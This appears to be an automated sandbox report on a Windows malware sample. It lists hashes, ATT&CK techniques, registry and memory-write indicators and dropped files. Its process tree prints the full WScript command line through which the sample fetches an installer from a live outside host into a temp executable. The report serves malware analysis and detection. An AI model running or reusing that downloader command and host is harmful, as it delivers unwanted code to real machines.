bbfbec6660619bbc9aaa523a941742512efe7d73d12ddf8aa76f184185bffeba

Analysis

max time kernel
118s
max time network
118s
platform
windows7_x64
resource
win7-20240708-en
resource tags

arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
submitted
03/10/2024, 17:44

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

0feaa8e57b052da1ce31fb6cdb9cbac4_JaffaCakes118.exe
Size

184KB
MD5

0feaa8e57b052da1ce31fb6cdb9cbac4
SHA1

65d0b5cad8f973895519f4d09f704485b863314f
SHA256

bbfbec6660619bbc9aaa523a941742512efe7d73d12ddf8aa76f184185bffeba
SHA512

678f17aa02c27953a536800616e03bfa135b91701647fabf7a1d0f0d0ba6cab09321b4e7324dc9ac4958ef9ac33278c3bfcd8d87fc51075def9a4cdae612b330
SSDEEP

3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3S:/7BSH8zUB+nGESaaRvoB7FJNndn7

Score

8^/10

discovery execution

Malware Config

Signatures

Blocklisted process makes network request 11 IoCs

flow	pid	Process
6	3004	WScript.exe
8	3004	WScript.exe
10	3004	WScript.exe
13	2784	WScript.exe
14	2784	WScript.exe
16	484	WScript.exe
17	484	WScript.exe
19	688	WScript.exe
20	688	WScript.exe
22	2084	WScript.exe
23	2084	WScript.exe

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	0feaa8e57b052da1ce31fb6cdb9cbac4_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 1064 wrote to memory of 3004	1064	0feaa8e57b052da1ce31fb6cdb9cbac4_JaffaCakes118.exe	30
PID 1064 wrote to memory of 3004	1064	0feaa8e57b052da1ce31fb6cdb9cbac4_JaffaCakes118.exe	30
PID 1064 wrote to memory of 3004	1064	0feaa8e57b052da1ce31fb6cdb9cbac4_JaffaCakes118.exe	30
PID 1064 wrote to memory of 3004	1064	0feaa8e57b052da1ce31fb6cdb9cbac4_JaffaCakes118.exe	30
PID 1064 wrote to memory of 2784	1064	0feaa8e57b052da1ce31fb6cdb9cbac4_JaffaCakes118.exe	32
PID 1064 wrote to memory of 2784	1064	0feaa8e57b052da1ce31fb6cdb9cbac4_JaffaCakes118.exe	32
PID 1064 wrote to memory of 2784	1064	0feaa8e57b052da1ce31fb6cdb9cbac4_JaffaCakes118.exe	32
PID 1064 wrote to memory of 2784	1064	0feaa8e57b052da1ce31fb6cdb9cbac4_JaffaCakes118.exe	32
PID 1064 wrote to memory of 484	1064	0feaa8e57b052da1ce31fb6cdb9cbac4_JaffaCakes118.exe	35
PID 1064 wrote to memory of 484	1064	0feaa8e57b052da1ce31fb6cdb9cbac4_JaffaCakes118.exe	35
PID 1064 wrote to memory of 484	1064	0feaa8e57b052da1ce31fb6cdb9cbac4_JaffaCakes118.exe	35
PID 1064 wrote to memory of 484	1064	0feaa8e57b052da1ce31fb6cdb9cbac4_JaffaCakes118.exe	35
PID 1064 wrote to memory of 688	1064	0feaa8e57b052da1ce31fb6cdb9cbac4_JaffaCakes118.exe	37
PID 1064 wrote to memory of 688	1064	0feaa8e57b052da1ce31fb6cdb9cbac4_JaffaCakes118.exe	37
PID 1064 wrote to memory of 688	1064	0feaa8e57b052da1ce31fb6cdb9cbac4_JaffaCakes118.exe	37
PID 1064 wrote to memory of 688	1064	0feaa8e57b052da1ce31fb6cdb9cbac4_JaffaCakes118.exe	37
PID 1064 wrote to memory of 2084	1064	0feaa8e57b052da1ce31fb6cdb9cbac4_JaffaCakes118.exe	39
PID 1064 wrote to memory of 2084	1064	0feaa8e57b052da1ce31fb6cdb9cbac4_JaffaCakes118.exe	39
PID 1064 wrote to memory of 2084	1064	0feaa8e57b052da1ce31fb6cdb9cbac4_JaffaCakes118.exe	39
PID 1064 wrote to memory of 2084	1064	0feaa8e57b052da1ce31fb6cdb9cbac4_JaffaCakes118.exe	39

C:\Users\Admin\AppData\Local\Temp\0feaa8e57b052da1ce31fb6cdb9cbac4_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\0feaa8e57b052da1ce31fb6cdb9cbac4_JaffaCakes118.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1064
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf9A2D.js" http://www.djapp.info/?domain=RFwsyJmRAk.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf9A2D.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:3004
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf9A2D.js" http://www.djapp.info/?domain=RFwsyJmRAk.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf9A2D.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:2784
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf9A2D.js" http://www.djapp.info/?domain=RFwsyJmRAk.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf9A2D.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:484
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf9A2D.js" http://www.djapp.info/?domain=RFwsyJmRAk.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf9A2D.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:688
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf9A2D.js" http://www.djapp.info/?domain=RFwsyJmRAk.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf9A2D.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:2084

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12

Filesize
1KB

MD5
7fb5fa1534dcf77f2125b2403b30a0ee

SHA1
365d96812a69ac0a4611ea4b70a3f306576cc3ea

SHA256
33a39e9ec2133230533a686ec43760026e014a3828c703707acbc150fe40fd6f

SHA512
a9279fd60505a1bfeef6fb07834cad0fd5be02fd405573fc1a5f59b991e9f88f5e81c32fe910f69bdc6585e71f02559895149eaf49c25b8ff955459fd60c0d2e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8

Filesize
436B

MD5
971c514f84bba0785f80aa1c23edfd79

SHA1
732acea710a87530c6b08ecdf32a110d254a54c8

SHA256
f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895

SHA512
43dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12

Filesize
174B

MD5
4541b6cb388e749fe28af34970e69539

SHA1
a35804a75f7d0d0d987d95b28e3ea2137a9888d4

SHA256
f086010481df4e4f720391245a6f106a7e00b5362871a526c6d037762b6c1b7d

SHA512
55422125eadb75a988a057eaaa6d07c837faf52998ac28da63a6b37d47444cdf66035f03cb714a328208791cd00605391218703714d588b3a5339a11f3c1930d

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8

Filesize
170B

MD5
2e7f05ca529e0ce40b936b94c655053c

SHA1
2520786c4144207ba82f6dd6edbe85020002d375

SHA256
1639bc42cc779f093270633ae4a598b36fd3de0114e42a4eb2925fdf6dd531d8

SHA512
650865113d335cb3cdaaa4a93386453d197ea629832c60239fc780ef1c0ab96c157f8c44acb664470eea85df2be3ba791031d4d761c75a9d2988c2be78336b21

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LPQ313RR\domain_profile[1].htm

Filesize
40KB

MD5
23a4c17a82a6224d90addb8fc8cffb7c

SHA1
da2af30c9b3a5cecba20416775e689b2bcfe9ab8

SHA256
4f4fd4314ea2f39797a4fe18f28d2ab5ecfccf85eeda0f84d16870740d00bee6

SHA512
d21cda15d9a94a56b7ee989505512c8cba0f1f10b1e2981034343568aa179ffde5d11e3551c39ebb3cf22a3db1e946610bdaaea8c78eea7ad4c390164ff0fa7a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LPQ313RR\domain_profile[1].htm

Filesize
40KB

MD5
36419c7fd6f634b4b4753bc38392ab74

SHA1
a670e178347afe246edf0ebfa83a6bec84a6c0b7

SHA256
ffccfb5a3d337c4f65d042ccc3f4280e0f689f0eece21fd2410ce67ee18deb3d

SHA512
2aee45806810d16e6dd4cb341e291a7d5bbe384c1003c8fa474ffa3ee4ae91946057ff3e91d010d304f66228934f2348ca5158ae966030cb749b9be60035670b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\UQFHO95Z\domain_profile[1].htm

Filesize
6KB

MD5
00a50a89ee41323c9ac3b1b3ac1183ed

SHA1
b574022c25d29d2201d39d3915683ce90a28b30b

SHA256
b3f671b07ee2d4fa76f0b0a0eba806239b661d0e64c991847740bd82a3c9fcc1

SHA512
fe833b75e04e5d713fba3c7c770b0e2171bbcea8001bbf75e3ee8756c7b333bb86bda08b4ac33a8cdf5301fe129bfb415df99739ed700f432b39bc432186cf5b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\UQFHO95Z\domain_profile[1].htm

Filesize
40KB

MD5
f119310bd9cabffba66e05da2156d7e3

SHA1
4b3ffb6b094de6eff54390e0ca0491cf819f7002

SHA256
2066a18b925b4371e775c0356b8b849a59ef4d8cc2c705b1eff51ec86655db73

SHA512
b84a6c8a524868e58a6cf38266f3c1cc932d431fa8093c1f1b1172b641403f8492cc9cb912ff965477e204dc7be298fc05a7dfee2b75d63c0503a80a5a0b2a7c

Download Submit
C:\Users\Admin\AppData\Local\Temp\CabE292.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\TarFB60.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\AppData\Local\Temp\fuf9A2D.js

Filesize
3KB

MD5
3813cab188d1de6f92f8b82c2059991b

SHA1
4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

SHA256
a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

SHA512
83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\0LW4VSQI.txt

Filesize
177B

MD5
2be0fa0946e0ee42190b24d70f5e4b90

SHA1
cda9c690b7c6705b9aa901ece8f8409be9333bc0

SHA256
59c7e61adf9577b05b9a7bad5a6d0445733f3e06964b835d9f316cb88bd9f273

SHA512
2124f611b26ef4ea36a9c3e29bfaf1e59df492cce97e23d41de409e531191e68f05f2d2b193a33d9abf86948703a508e685329ecdd7ea5a023808171701bc71d

Download Submit